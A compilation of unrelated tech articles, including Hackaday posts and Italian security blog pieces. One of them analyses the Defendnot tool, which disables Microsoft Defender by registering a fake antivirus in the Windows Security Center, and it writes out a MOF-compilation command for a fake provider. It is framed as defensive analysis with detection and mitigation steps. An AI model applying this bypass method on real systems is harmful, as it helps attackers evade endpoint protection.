What can you do if your circuit repair diagnosis indicates an open circuit within an integrated circuit (IC)? Your IC got too hot and internal wiring has come loose. You could replace the IC, sure. But what if the IC contains encryption secrets? Then you would be forced to grind back the epoxy and fix those open circuits yourself. That is, if you’re skilled enough!
In this video our hacker [YCS] fixes a Mercedes-Benz encryption chip from an electronic car key. First, the black epoxy surface is polished off, all the way back to the PCB with a very fine gradient. As the gold threads begin to be visible we need to slow down and be very careful.
The repair job is to reconnect the PCB points with the silicon body inside the chip. The PCB joints aren’t as delicate and precious as the silicon body points, those are the riskiest part. If you make a mistake with those then repair will be impossible. Then you tin the pads using solder for the PCB points and pure tin and hot air for the silicon body points.
Once that’s done you can use fine silver wire to join the points. If testing indicates success then you can complete the job with glue to hold the new wiring in place. Everything is easy when you know how!
Does repair work get more dangerous and fiddly than this? Well, sometimes.
youtube.com/embed/9y7xRpFYLjk?…
Thanks to [J. Peterson] for this tip.
The World Wide Web and the Death of Graceful Degradation
In the early days of the World Wide Web – with the Year 2000 and the threat of a global collapse of society were still years away – the crafting of a website on the WWW was both special and increasingly more common. Courtesy of free hosting services popping up left and right in a landscape still mercifully devoid of today’s ‘social media’, the WWW’s democratizing influence allowed anyone to try their hands at web design. With varying results, as those of us who ventured into the Geocities wilds can attest to.
Back then we naturally had web standards, courtesy of the W3C, though Microsoft, Netscape, etc. tried to upstage each other with varying implementation levels (e.g. no iframes in Netscape 4.7) and various proprietary HTML and CSS tags. Most people were on dial-up or equivalently anemic internet connections, so designing a website could be a painful lesson in optimization and targeting the lowest common denominator.
This was also the era of graceful degradation, where us web designers had it hammered into our skulls that using and navigating a website should be possible even in a text-only browser like Lynx, w3m or antique browsers like IE 3.x. Fast-forward a few decades and today the inverse is true, where it is your responsibility as a website visitor to have the latest browser and fastest internet connection, or you may even be denied access.
What exactly happened to flip everything upside-down, and is this truly the WWW that we want?
User Vs Shinies
Back in the late 90s, early 2000s, a miserable WWW experience for the average user involved graphics-heavy websites that took literal minutes to load on a 56k dial-up connection. Add to this the occasional website owner who figured that using Flash or Java applets for part of, or an entire website was a brilliant idea, and had you sit through ten minutes (or more) of a loading sequence before being able to view anything.
Another contentious issue was that of the back- and forward buttons in the browser as the standard way to navigate. Using Flash or Java broke this, as did HTML framesets (and iframes), which not only made navigating websites a pain, but also made sharing links to a specific resource on a website impossible without serious hacks like offering special deep links and reloading that page within the frameset.
As much as web designers and developers felt the lure of New Shiny Tech to make a website pop, ultimately accessibility had to be key. Accessibility, through graceful degradation, meant that you could design a very shiny website using the latest CSS layout tricks (ditching table-based layouts for better or worse), but if a stylesheet or some Java- or VBScript stuff didn’t load, the user would still be able to read and navigate, at most in a HTML 1.x-like fashion. When you consider that HTML is literally just a document markup language, this makes a lot of sense.Credit: Babbage, Wikimedia.
More succinctly put, you distinguish between the core functionality (text, images, navigation) and the cosmetics. When you think of a website from the perspective of a text-only browser or assistive technology like screen readers, the difference should be quite obvious. The HTML tags mark up the content of the document, letting the document viewer know whether something is a heading, a paragraph, and where an image or other content should be referenced (or embedded).
If the viewer does not support stylesheets, or only an older version (e.g. CSS 2.1 and not 3.x), this should not affect being able to read text, view images and do things like listen to embedded audio clips on the page. Of course, this basic concept is what is effectively broken now.
It’s An App Now
Somewhere along the way, the idea of a website being an (interactive) document seems to have been dropped in favor of a the website instead being a ‘web application’, or web app for short. This is reflected in the countless JavaScript, ColdFusion, PHP, Ruby, Java and other frameworks for server and client side functionality. Rather than a document, a ‘web page’ is now the UI of the application, not unlike a graphical terminal. Even the WordPress editor in which this article was written is in effect just a web app that is in constant communication with the remote WordPress server.
This in itself is not a problem, as being able to do partial page refreshes rather than full on page reloads can save a lot of bandwidth and copious amounts of sanity with preserving page position and lack of flickering. What is however a problem is how there’s no real graceful degradation amidst all of this any more, mostly due to hard requirements for often bleeding edge features by these frameworks, especially in terms of JavaScript and CSS.
Sometimes these requirements are apparently merely a way to not do any testing on older or alternative browsers, with ‘forum’ software Discourse (not to be confused with Disqus) being a shining example here. It insists that you must have the ‘latest, stable release’ of either Microsoft Edge, Google Chrome, Mozilla Firefox or Apple Safari. Purportedly this is so that the client-side JavaScript (Ember.js) framework is happy, but as e.g. Pale Moon users have found out, the problem is with a piece of JS that merely detects the browser, not the features. Blocking the browser-detect-*
script in e.g. an adblocker restores full functionality to Discourse-afflicted pages.
Wrong Focus
It’s quite the understatement to say that over the past decades, websites have changed. For us greybeards who were around to admire the nascent WWW, things seemed to move at a more gradual pace back then. Multimedia wasn’t everywhere yet, and there was no Google et al. pushing its own agenda along with Digital Restrictions Management (DRM) onto us internet users via the W3C, which resulted in the EFF resigning in protest.Google Search open in the Pale Moon browser.
Although Google et al. ostensibly profess to have only our best interests at heart when features were added to Chrome, the very capable plugins system from Netscape and Internet Explorer taken out back and WebExtensions Manifest V3 introduced (with the EFF absolutely venomous about the latter), privacy concerns are mounting amidst concerns that corporations now control the WWW, with even new HTML, CSS and JS features being pushed by Google solely for its use in Chrome.
For those of us who still use traditional browsers like Pale Moon (forked from Firefox in 2009), it is especially the dizzying pace of new ‘features’ that discourages us from using effectively non-Chromium-based browsers, with websites all too often having only been tested in Chrome. Functionality in Safari, Pale Moon, etc. often is more a matter of luck as the assumption is made by today’s crop of web devs that everyone uses the latest and greatest Chrome browser version. This ensures that using non-Chromium browsers is fraught with functionally defective websites, as the ‘Web Compatibility Support’ section of the Pale Moon forum illustrates.
Question is whether this is the web which we, the users, want to see.
Low-Fidelity Feature
Another unpleasant side-effect of web apps is that they force an increasing amount of JS code to be downloaded, compiled and ran. This contrasts with plain HTML and CSS pages that tend to be mere kilobytes in size in addition to any images. Back in The Olden Days browsers gave you the option to disable JavaScript, as the assumption was that JS wasn’t used for anything critical. These days if you try to browse with e.g. a JS blocking extension like NoScript, you’ll rapidly find that there’s zero consideration for this, and many sites will display just a white page because they rely on a JS-based stub to do the actual rendering of the page rather than the browser.
In this and earlier described scenarios the consequence is the same: you must be using the latest Chromium-based browser to use many sites, you will be using a lot of RAM and CPU for even basic pages, and forget about using retro- or alternative systems that do not support the latest encryption standards and certificates.
The latter is due to the removal of non-encrypted HTTP from many browsers, because for some reason downloading public information from HTTP and FTP sites without encrypting said public data is a massive security threat now, and the former is due to the frankly absurd amounts of JS, with the Task Manager feature in many browsers showing the resource usage per tab, e.g.:The Task Manager in Microsoft Edge showing a few active tabs and their resource usage.
Of these tabs, there is no way to reduce their resource usage, no ‘graceful degradation’ or low-fidelity mode, so that older systems as well as the average smart phone or tablet will struggle or simply keel over to keep up with the demands of the modern WWW, with even a basic page using more RAM than the average PC had installed by the late 90s.
Meanwhile the problems that we web devs were moaning about around 2000 such as an easy way to center content with CSS got ignored, while some enterprising developers have done the hard work of solving the graceful degradation problem themselves. A good example of this is the FrogFind! search engine, which strips down DuckDuckGo search results even further, before passing any URLs you click through a PHP port of Mozilla’s Readability. This strips out anything but the main content, allowing modern website content to be viewed on systems with browsers that were current in the very early 1990s.
In short, graceful degradation is mostly an issue of wanting to, rather than it being some kind of unsurmountable obstacle. It requires learning the same lessons as the folk back in the Flash and Java applet days had to: namely that your visitors don’t care how shiny your website, or how much you love the convoluted architecture and technologies behind it. At the end of the day your visitors Just Want Things to Work, even if that means missing out on the latest variation of a Flash-based spinning widget or something similarly useless that isn’t content.
Tl;dr: content is for your visitors, the eyecandy is for you and your shareholders.
Bypass di Microsoft Defender mediante Defendnot: Analisi Tecnica e Strategie di Mitigazione
Nel panorama delle minacce odierne, Defendnotrappresenta un sofisticato malware in grado di disattivare Microsoft Defender sfruttando esclusivamente meccanismi legittimi di Windows. A differenza di attacchi tradizionali, non richiede privilegi elevati, non modifica in modo permanente le chiavi di registro e non solleva alert immediati da parte dei software di difesa tradizionali o soluzioni EDR (Endpoint Detection and Response).
L’efficacia di Defendnot risiede nella sua capacità di interfacciarsi con le API e i meccanismi di sicurezza nativi del sistema operativo Windows, in particolare:
- WMI (Windows Management Instrumentation)
- COM (Component Object Model)
- Windows Security Center (WSC)
2. Processi di esecuzione del Malware
2.1 Abuso del Windows Security Center (WSC)
Il comportamento principale del malware consiste nel simulare la presenza di un antivirus attivo tramite la registrazione fittizia nel WSC, inducendo Defender a disattivarsi automaticamente.
❝ Windows Defender si disattiva se rileva la presenza di un altro antivirus “compatibile” registrato correttamente nel sistema. ❞
Questa simulazione viene ottenuta sfruttando interfacce COM, come IWSCProduct e IWSCProductList, e avvalendosi di script PowerShell o codice compilato (es. C++).
2.2 Uso di WMI e COM senza Elevazione di Privilegi
Defendnot non modifica GPO, non scrive nel registro e non uccide processi. Opera in modo stealth grazie a:
- WMI Namespace: root\SecurityCenter2
- COM Object: WSC.SecurityCenter2
In molti contesti aziendali mal configurati, questi componenti possono essere invocati anche da utenti standard, rendendo il malware estremamente pericoloso in termini di lateral movement e persistence.
2.3 Iniezione e Persistenza
In alcuni casi, Defendnot può essere iniettato in processi fidati (es. taskmgr.exe) o configurato per l’esecuzione automatica tramite Task Scheduler o chiavi Run.
3. Esempi Tecnici Pratici
3.1 Simulazione WMI via PowerShell
Questo codice è legittimo ma può essere esteso per registrare falsi antivirus con stato “attivo e aggiornato”, forzando così la disattivazione di Defender.
3.2 Spoofing avanzato in C++ (uso COM diretto)
Questa simulazione è sufficiente a ingannare Defender e farlo disattivare come da policy Microsoft.
3.3 Analisi dello Stato di Defender tramite WMI (PowerShell)
Questo script permette di interrogare direttamente lo stato di Microsoft Defender, utile per verificare se è stato disattivato in modo anomalo.
Utile per eseguire un controllo incrociato: se Defender risulta disattivato e non vi è alcun AV noto attivo, è probabile la presenza di spoofing o bypass.
3.4 Registrazione Fittizia di AV via WMI Spoof (WMI MOF Injection – Teorico)
Una tecnica usata in scenari più avanzati può includere MOF Injection per creare provider fittizi direttamente in WMI (esempio concettuale):
Compilato con:
Compilato con:
mofcomp.exe fakeav.mof
Questa tecnica è estremamente stealth e sfrutta la capacità di WMI di accettare nuovi provider persistenti. Va monitorata con attenzione.
3.5 Monitoraggio WMI Eventi in Tempo Reale (PowerShell + WQL)
Script che intercetta modifiche sospette al namespace SecurityCenter2:
Questo è particolarmente utile in ambienti aziendali: può essere lasciato in esecuzione su server o endpoint sensibili per tracciare cambiamenti in tempo reale.
3.6 Logging Persistente di AV Fittizi tramite Task Scheduler (PowerShell)
Esempio per identificare eventuali task che iniettano strumenti di bypass all’avvio:
Una semplice scansione dei task può rivelare meccanismi di persistenza non evidenti, soprattutto se il payload è un fake AV o un loader offuscato.
3.7 Ispezione della Configurazione Defender tramite MpPreference
Permette di individuare modifiche anomale o disabilitazioni silenziose:
Se DisableRealtimeMonitoring è attivo, Defender è stato disattivato. Anche UILockdown può indicare manipolazioni da malware avanzati.
3.8 Enumerazione e Verifica dei Moduli Caricati nel Processo WSC (C++)
Controllare che non vi siano DLL anomale caricate nel processo del Security Center:
Gli strumenti come Defendnot possono essere iniettati nel processo SecurityHealthService.exe. Il controllo dei moduli può rivelare DLL anomale.
3.9 Identificazione di AV Fake tramite Analisi della Firma del File
Esempio in PowerShell per analizzare i binari AV registrati:
Gli AV fake spesso non sono firmati o hanno certificati self-signed. Questo controllo può essere integrato in audit automatizzati.
4. Script di Monitoraggio e Rilevamento
Per monitorare al meglio eventuali anomalie, si può usare un modulo centralizzato da eseguire sull’host Windows per avere una visione d’insieme su:
- Stato di Defender
- Prodotti AV registrati
- Anomalie nei nomi/firme
- Task sospetti legati a fake AV
Si consiglia di schedulare l’esecuzione di questa dashboard su base oraria tramite Task Scheduler, salvando l’output in file di log o inviandolo via e-mail. È anche possibile integrarlo con SIEM (Splunk, Sentinel, etc.) via forwarding del log ed è estendibile con funzionalità di auto-remediation, ad esempio disinstallazione o terminazione di AV sospetti.
4.1 PowerShell: Rilevamento Anomalie in WSC
Questo script decodifica lo stato binario dei provider AV registrati e lancia un allarme se rileva anomalie (es. nomi generici, binari non firmati o assenti).
5. Strategie di Mitigazione e Difesa
Per contenere e prevenire gli effetti di malware come Defendnot, si raccomanda di adottare un approccio multilivello:
5.1. Monitoraggio WSC Periodico
Automatizzare il controllo su base oraria/giornaliera e inviare alert su SIEM o email.
5.2. Abilitare Tamper Protection
Blocca modifiche non autorizzate alla configurazione di Defender, comprese modifiche via WMI o PowerShell.
5.3. Applicare Policy di Lock-down
Utilizzare Group Policy per disabilitare l’opzione “Disattiva Microsoft Defender”:
Computer Configuration > Admin Templates > Microsoft Defender Antivirus > Turn off Defender = Disabled
5.4. Controllo Accessi a WMI e COM
Strumenti EDR devono tracciare accessi sospetti a:
- root\SecurityCenter2
- COM object WSC.SecurityCenter2
- Script non firmati che accedono a questi componenti
5.5. Rilevamento Comportamentale con EDR
EDR avanzati devono essere configurati per:
- Rilevare registrazioni anomale di provider AV.
- Intercettare iniezioni in processi trusted.
- Rilevare uso anomalo delle API COM/WMI da script non firmati.
6. Conclusioni
L’analisi di Defendnot ci porta a riflettere su un aspetto sempre più attuale della cybersecurity: non servono necessariamente exploit sofisticati o malware rumorosi per compromettere un sistema. In questo caso, lo strumento agisce in silenzio, sfruttando le stesse regole e API che Windows mette a disposizione per la gestione dei software di sicurezza. E lo fa in modo così pulito da passare facilmente inosservato, anche agli occhi di molti EDR.
Quello che colpisce è la semplicità e l’eleganza dell’attacco: nessuna modifica al registro, nessun bisogno di privilegi elevati, nessuna firma malevola nel file. Solo una falsa comunicazione al Security Center, che crede di vedere un altro antivirus attivo – e quindi disattiva Defender come previsto dalla logica del sistema operativo.
È un promemoria importante: oggi non basta installare un antivirus per sentirsi protetti. Serve visibilità, monitoraggio continuo e una buona dose di diffidenza verso tutto ciò che sembra “normale”. Serve anche conoscere strumenti come Defendnot per capire come si muovono gli attaccanti moderni – spesso sfruttando ciò che il sistema permette, piuttosto che forzarlo.
In ottica difensiva, è fondamentale:
- Rafforzare le impostazioni di sicurezza, ad esempio attivando Tamper Protection.
- Monitorare regolarmente lo stato dei provider registrati nel Security Center.
- Utilizzare strumenti che vadano oltre la semplice firma o il comportamento, e che osservino come cambiano i contesti e le configurazioni del sistema.
In definitiva, Defendnot non è solo un malware: è un campanello d’allarme. Dimostra che le minacce più efficaci non sempre arrivano con il “classico” malware, ma spesso passano dalla zona grigia tra funzionalità lecite e uso malevolo. Ed è lì che dobbiamo concentrare le nostre difese.
L'articolo Bypass di Microsoft Defender mediante Defendnot: Analisi Tecnica e Strategie di Mitigazione proviene da il blog della sicurezza informatica.
DK 9x29 - Cose da Impero
Microsoft su ordine di Trump interrompe il servizo di posta elettronica di un cittadino britannico, impiegato di un organo internazionale con sede all'Aia, di cui gli USA non fanno parte. Prova provata che le fliali europee di compagnie USA sono una estensione diretta del potere imperiale americano. Aziende e istituzioni europee se ne devono svincolare, e al più presto.
spreaker.com/episode/dk-9x29-c…
An Awful 1990s PDA Delivers AI Wisdom
There was a period in the 1990s when it seemed like the personal data assistant (PDA) was going to be the device of the future. If you were lucky you could afford a Psion, a PalmPilot, or even the famous Apple Newton — but to trap the unwary there were a slew of far less capable machines competing for market share.
[Nick Bild] has one of these, branded Rolodex, and in a bid to make using a generative AI less alluring, he’s set it up as the interface to an LLM hosted on a Raspberry Pi 400. This hack is thus mostly a tale of reverse engineering the device’s serial protocol to free it from its Windows application.
Finding the baud rate was simple enough, but the encoding scheme was unexpectedly fiddly. Sadly the device doesn’t come with a terminal because these machines were very much single-purpose, but it does have a memo app that allows transfer of text files. This is the wildly inefficient medium through which the communication with the LLM happens, and it satisfies the requirement of making the process painful.
We see this type of PDA quite regularly in second hand shops, indeed you’ll find nearly identical devices from multiple manufacturers also sporting software such as dictionaries or a thesaurus. Back in the day they always seemed to be advertised in Sunday newspapers and aimed at older people. We’ve never got to the bottom of who the OEM was who manufactured them, or indeed cracked one apart to find the inevitable black epoxy blob processor. If we had to place a bet though, we’d guess there’s an 8051 core in there somewhere.
youtube.com/embed/GvXCZfoAy88?…
PentaPico: A Pi Pico Cluster For Image Convolution
Here’s something fun. Our hacker [Willow Cunningham] has sent us a copy of his homework. This is his final project for the “ECE 574: Cluster Computing” course at the University of Maine, Orono.
It was enjoyable going through the process of having a good look at everything in this project. The project is a “cluster” of 5x Raspberry Pi Pico microcontrollers — with one head node as the leader and four compute nodes that work on tasks. The software for the both nodes is written in C. The head node is connected to a workstation via USB 1.1 allowing the system to be controlled with a Python script.
The cluster is configured to process an embarrassingly parallel image convolution. The input image is copied into the head node via USB which then divvies it up and distributes it to n compute nodes via I2C, one node at a time. Results are given for n = {1,2,4} compute nodes.
It turns out that the work of distributing the data dwarfs the compute by three orders of magnitude. The result is that the whole system gets slower the more nodes we add. But we’re not going to hold that against anyone. This was a fascinating investigation and we were impressed by [Willow]’s technical chops. This was a complicated project with diverse hardware and software challenges and he’s done a great job making it all work and in the best scientific tradition.
It was fun reading his journal in which he chronicled his progress and frustrations during the project. His final report in IEEE format was created using LaTeX and Overleaf, at only six pages it is an easy and interesting read.
For anyone interested in cluster tech be sure to check out the 256-core RISC-V megacluster and a RISC-V supercluster for very low cost.
Falso Mito: Se uso una VPN, sono completamente al sicuro anche su reti WiFi Aperte e non sicure
Molti credono che l’utilizzo di una VPN garantisca una protezione totale durante la navigazione, anche su reti WiFi totalmente aperte e non sicure. Sebbene le VPN siano strumenti efficaci per crittografare il traffico e impedire l’intercettazione dei dati, non sono in grado di poterci proteggere da tutti i rischi.
Nell’articolo riportato qui sotto, spieghiamo in maniera dettagliata come funziona una VPN (Virtual Private Network) . L’articolo tratta in modo approfondito le VPN , analizzando come funziona e quali vantaggi specifici offre. Vengono descritti i diversi tipi di VPN, i criteri per scegliere la soluzione migliore, e le best practices per implementare in modo sicuro.
Virtual Private Network (VPN): Cos’è, Come Funziona e Perché
redhotcyber.com/post/virtual-p…
Pur confermando quanto riportato nell’articolo, ovvero che:
Una VPN non solo migliora la sicurezza e la privacy, ma offre anche maggiore libertà e controllo sulle informazioni trasmesse online, rendendola uno strumento fondamentale per chiunque voglia proteggere la propria identità digitale e i propri dati sensibili
È fondamentale essere consapevoli dei suoi limiti e delle potenziali vulnerabilità.
Ad esempio, la vulnerabilità CVE-2024-3661, nota come “TunnelVision“, dimostra come sia possibile per un attaccante reindirizzare il traffico fuori dal tunnel VPN senza che l’utente se ne accorga. Questo attacco sfrutta l’opzione 121 del protocollo DHCP per configurare rotte statiche nel sistema della vittima, permettendo al traffico di essere instradato attraverso canali non sicuri senza che l’utente ne sia consapevole.
Mentre possiamo affermare che una VPN protegge i dati in transito, dobbiamo ricordarci che per esempio non:
- Blocca gli attacchi di phishing: Una VPN non può impedire che clicchiamo su link dannosi o che inseriamo le nostre credenziali su siti fraudolenti.
- Protegge da malware o attacchi diretti al dispositivo (compromissioni locali): Se il nostro dispositivo è vulnerabile o infetto, una VPN non offre protezione contro malware, ransomware o minacce su reti locali.
Evidenze
1- Tunnel Vision
In questo video dimostrativo viene riportato un POC della CVE-2024-3661- Zscaler (TunnelVision) che evidenzia come un attaccante possa bypassare il tunnel VPN sfruttando l’opzione 121 del DHCP:
youtube.com/embed/ajsLmZia6UU?…
Video di Leviathan Security Group
2- VPN Con sorpresa
In quest’altro articolo invece diamo evidenza come per esempio diversi siti Web LetsVPN fraudolenti condividono un’interfaccia utente comune e sono deliberatamente progettati per distribuire malware , mascherandosi da applicazione LetsVPN autentica.
VPN Con Sorpresa! Oltre all’Anonimato, Offerta anche una Backdoor Gratuitamente
redhotcyber.com/post/vpn-con-s…
3 – Gravi Vulnerabilità nei Protocolli VPN
In quest’altro articolo, trattiamo di come alcuni sistemi vpn configurati in modo errato accettano i pacchetti tunnel senza verificare il mittente. Ciò consente agli aggressori di inviare pacchetti appositamente predisposti contenenti l’indirizzo IP della vittima a un host vulnerabile, costringendo l’host a inoltrare un pacchetto interno alla vittima, che apre la porta agli aggressori per lanciare ulteriori attacchi.
Nell’articolo evidenziamo anche che sono state identificate sono le seguenti CVE:
- CVE-2024-7596 (UDP generico Incapsulamento)
- CVE-2024-7595 (GRE e GRE6)
- CVE-2025-23018 (IPv4-in-IPv6 e IPv6-in-IPv6)
- CVE-2025-23019 (IPv6- in-IPv4)
Gravi Vulnerabilità nei Protocolli VPN: 4 Milioni di Sistemi Vulnerabili a Nuovi Bug di Tunneling!
redhotcyber.com/post/gravi-vul…
Conclusioni
Le VPN rappresentano un tassello importante nella protezione della nostra identità digitale e dei dati in transito, ma non offrono una protezione completa contro tutte le minacce. Come ogni strumento di sicurezza, devono essere configurate correttamente, mantenute aggiornate e utilizzate con responsabilità e consapevolezza.
In linea generale, le VPN non rappresentano una soluzione definitiva né sufficiente per garantire la sicurezza. È fondamentale affrontare il tema della sicurezza delle reti partendo dalla loro natura: molte infrastrutture — in particolare le reti Wi-Fi aperte — nascono insicure “by design”.
Nei prossimi articoli inizieremo a esplorare le misure tecniche che possono essere adottate per rafforzare queste reti, proteggere gli utenti e ridurre il rischio di attacchi, anche in ambienti esposti o pubblici.
➡️ Adottare una postura di sicurezza proattiva è essenziale: l’uso consapevole della VPN deve essere solo uno degli strumenti in un approccio più ampio e strutturato, che approfondiremo passo dopo passo nei prossimi articoli sulle mitigazioni.
L'articolo Falso Mito: Se uso una VPN, sono completamente al sicuro anche su reti WiFi Aperte e non sicure proviene da il blog della sicurezza informatica.
Cyber Divulgazione: Fine della One-Man-Band? La Community è la Nuova Sicurezza
Quanto è rilevante il ruolo della community per la creazione di contenuti informativi relativi alla sicurezza cyber? Possiamo dire che è tutta una questione di stile.
O di format. E di volontà.
C’è chi predilige un approccio alla “ve lo spiego io”. Il che risulta sempre meno credibile nel momento in cui c’è la tendenza a proporsi come tuttologi senza mai riconoscere alcun contributo, merito o ispirazione ad altri soggetti. Inoltre, il rischio di transitare dal cringe al cancer diventa piuttosto rilevante.
Gli scenari di sicurezza cyber sono un multiverso particolarmente complesso. Che tenderà a richiedere skill sempre più varie, verticalizzazioni e soprattutto valorizzerà ogni esperienza. Se conoscere i fondamentali è sempre utile, anche sapere da dove si proviene non è male. E no, non significa diventare dei necromanti della tecnologia (necrotek?), ma conoscere la storia della (in)sicurezza e la sua evoluzione nel tempo.
Ci può essere spazio per l’illusione allucinatoria di una one-man-band?
Semmai, ci può essere un gruppo e un frontman. Come in un buon party c’è il face. Ma è un membro del party, per l’appunto. Chi può raccontare meglio una storia, divulgare, farla conoscere. Ma senza il supporto del gruppo sarebbe più nudo di quel Cyber Re che ritiene – errando – di poter silenziare il mondo. Ma prima o poi la realtà, che come ci ricorda Philip K. Dick ha la brutta abitudine di continuare ad esistere nonostante la nostra volontà di negarla, presenta il conto.
Insomma: la community è una mitica forgia di idee per chi fa informazione e divulgazione in ambito cyber. Il quale, beninteso, non è detto che debba essere un esperto (nota: non deve nemmeno presentarsi come “appassionato” nel tentativo di simulare understatement) ma che abbia il rispetto di riconoscere il ruolo della community, così come la dignità delle fonti e dei riconoscimenti, avendo il coraggio di impiegare anche un linguaggio tecnico senza cadere nelle trappole della banalizzazione. E resistere alla tentazione di asservirsi all’hype o al trend del momento.
Instaurare una buona sinergia con la community dà valore all’informazione. Un valore che il pubblico percepisce, dal momento che la domanda di informazione dei lettori – o dei follower – è tutto ciò che inevitabilmente, nel tempo, comanda l’offerta. Una maggiore educazione digitale, che comprende quanto meno una consapevolezza delle tecnologie, delle dinamiche della società digitale e dei comportamenti, comporta una richiesta di contenuti di qualità, interattivi e non forniti “a cucchiaiate” senza ricercare feedback o interazioni.
Dal momento che la moneta spirituale richiesta è quella del tempo e dell’attenzione, relegare il destinatario ad un ruolo passivo è non solo irrispettoso ma è una strategia destinata a fallire nel lungo periodo. Massima resa con un “effetto wow”, ma prima o poi la saturazione arriva.
Al contrario, offrire al lettore l’opportunità di assumere un ruolo attivo ed entrare a far parte della community è quell’azione di ricollocare l’umano al centro che è un intento che oggi tanto si racconta e troppo poco si persegue. Soprattutto quando bisogna fare la propria parte rinunciando a facili scorciatoie.
Grazie alla community che è e che sarà, però, si può ancora essere in grado di resistere a sacrificare la qualità dell’informazione cyber sull’altare di algoritmi e delle facili leve di engagement.
Il meme proviene dritto per dritto dalla conclusione del mio intervento alla RHC Conference 2025.
L'articolo Cyber Divulgazione: Fine della One-Man-Band? La Community è la Nuova Sicurezza proviene da il blog della sicurezza informatica.
An Open-Source Wii U Gamepad
Although Nintendo is mostly famous for making great games, they also have an infamous reputation for being highly litigious not only for reasonable qualms like outright piracy of their games, but additionally for more gray areas like homebrew development on their platforms or posting gameplay videos online. With that sort of reputation it’s not surprising that they don’t release open-source drivers for their platforms, especially those like the Wii U with unique controllers that are difficult to emulate. This Wii U gamepad emulator seeks to bridge that gap.
The major issue with the Wii U compared to other Nintendo platforms like the SNES or GameCube is that the controller looks like a standalone console and behaves similarly as well, with its own built-in screen. Buying replacement controllers for this unusual device isn’t straightforward either; outside of Japan Nintendo did not offer an easy path for consumers to buy controllers. This software suite, called Vanilla, aims to allow other non-Nintendo hardware to bridge this gap, bringing in support for things like the Steam Deck, the Nintendo Switch, various Linux devices, or Android smartphones which all have the touch screens required for Wii U controllers. The only other hardware requirement is that the device must support 802.11n 5 GHz Wi-Fi.
Although the Wii U was somewhat of a flop commercially, it seems to be experiencing a bit of a resurgence among collectors, retro gaming enthusiasts, and homebrew gaming developers as well. Many games were incredibly well made and are still experiencing continued life on the Switch, and plenty of gamers are looking for the original experience on the Wii U instead. If you’ve somehow found yourself in the opposite position of owning of a Wii U controller but not the console, though, you can still get all the Wii U functionality back with this console modification.
Thanks to [Kat] for the tip!
Scoperto un nuovo Side-Channel sui processori Intel che consente l’estrazione dei segreti dal Kernel
Gli esperti del Politecnico federale di Zurigo (ETH Zurigo) hanno scoperto un problema che minaccia tutti i moderni processori Intel. Il bug consente agli aggressori di estrarre dati sensibili dalla memoria allocata ai componenti di sistema privilegiati, come il kernel del sistema operativo.
Queste aree di memoria contengono in genere informazioni quali password, chiavi crittografiche, memoria di altri processi e strutture dati del kernel, pertanto è fondamentale garantire che siano protette da perdite dei dati. Secondo i ricercatori, le protezioni contro la vulnerabilità Spectre v2 durano da circa sei anni, ma un nuovo attacco chiamato Branch Predictor Race Conditions consente di aggirarle.
La vulnerabilità associata a questo fenomeno è stata definita dagli esperti “branch privilege injection” alla quale è stata assegnato il seguente CVE-2024-45332. Questo problema causa una condizione di competizione nel sottosistema predittore di diramazione utilizzato nei processori Intel.
I branch predictors (predittori di diramazione), come il Branch Target Buffer (BTB) e l’Indirect Branch Predictor (IBP), sono componenti hardware che tentano di prevedere l’esito di un’istruzione di diramazione prima del suo completamento, al fine di ottimizzare le prestazioni. Tali previsioni sono speculative, il che significa che vengono annullate se si rivelano errate. Tuttavia, se sono corrette, contribuiscono a migliorare le prestazioni.
I ricercatori hanno scoperto che gli aggiornamenti dei branch predictors nei processori Intel non sono sincronizzati con l’esecuzione delle istruzioni, il che consente loro di “infiltrarsi” oltre i limiti dei privilegi. Pertanto, se si verifica un cambio di privilegio (ad esempio dalla modalità utente alla modalità kernel), esiste una piccola finestra temporale durante la quale l’aggiornamento potrebbe essere associato al livello di privilegio sbagliato.
Di conseguenza, l’isolamento tra l’utente e il kernel viene interrotto e un utente non privilegiato può far trapelare dati dai processi privilegiati. I ricercatori hanno creato unexploit PoC che addestra il processore a prevedere un target di branch specifico, quindi effettua una chiamata di sistema per spostare l’esecuzione al kernel del sistema operativo, con conseguente esecuzione speculativa tramite un target controllato dall’aggressore (gadget). Il codice accede quindi ai dati segreti nella cache utilizzando metodi side-channel e le informazioni vengono trasmesse all’aggressore.
I ricercatori hanno dimostrato il loro attacco su Ubuntu 24.04 con meccanismi di protezione predefiniti abilitati per leggere il contenuto del file /etc/shadow/ contenente le password degli account con hash. L’exploit raggiunge una velocità massima di estrazione dati di 5,6 KB/s e dimostra una precisione del 99,8%. Sebbene l’attacco sia stato dimostrato su Linux, il problema è presente anche a livello hardware, quindi potrebbe teoricamente essere utilizzato anche contro i sistemi Windows.
Si segnala che la vulnerabilità CVE-2024-45332 colpisce tutti i processori Intel a partire dalla nona generazione (Coffee Lake, Comet Lake, Rocket Lake, Alder Lake e Raptor Lake). Sono stati esaminati anche i chip Arm Cortex-X1, Cortex-A76 e AMD Zen 5 e Zen 4, ma non sono risultati interessati al CVE-2024-45332.
I ricercatori hanno comunicato le loro scoperte agli ingegneri Intel nel settembre 2024 e l’azienda ha rilasciato aggiornamenti del microcodice che hanno risolto il problema CVE-2024-45332. Si dice che le patch del firmware riducano le prestazioni del 2,7%, mentre le patch del software riducono le prestazioni dell’1,6-8,3% a seconda del processore.
Il team dell’ETH di Zurigo ha affermato che presenterà il suo exploit in tutti i dettagli durante una conferenza alla conferenza USENIX Security 2025.
L'articolo Scoperto un nuovo Side-Channel sui processori Intel che consente l’estrazione dei segreti dal Kernel proviene da il blog della sicurezza informatica.
In Cina il CNVD premia i migliori ricercatori di sicurezza e la collaborazione tra istituzioni e aziende
Durante una conferenza nazionale dedicata alla sicurezza informatica, sono stati ufficialmente premiati enti, aziende e professionisti che nel 2024 hanno dato un contributo significativo al National Information Security Vulnerability Database (CNNVD). L’evento ha messo in luce l’importanza della collaborazione tra istituzioni pubbliche, aziende private e mondo accademico per migliorare la capacità del Paese di individuare, segnalare e mitigare le vulnerabilità nelle infrastrutture critiche.
Nel corso dell’evento sono stati consegnati undici premi distinti, tra cui il “Premio Miglior Esordiente”, il “Premio per il Contributo Eccezionale al Reporting di Alta Qualità”, quello per le “Vulnerabilità di Alta Qualità”, il premio per il “Controllo delle Vulnerabilità”, e ulteriori riconoscimenti a università, esperti tecnici e produttori impegnati nella condivisione delle informazioni. I vincitori includono grandi nomi del settore tech e della cybersicurezza cinese come Huawei, Tencent, Qi’anxin, Sangfor e molte altre realtà emergenti.
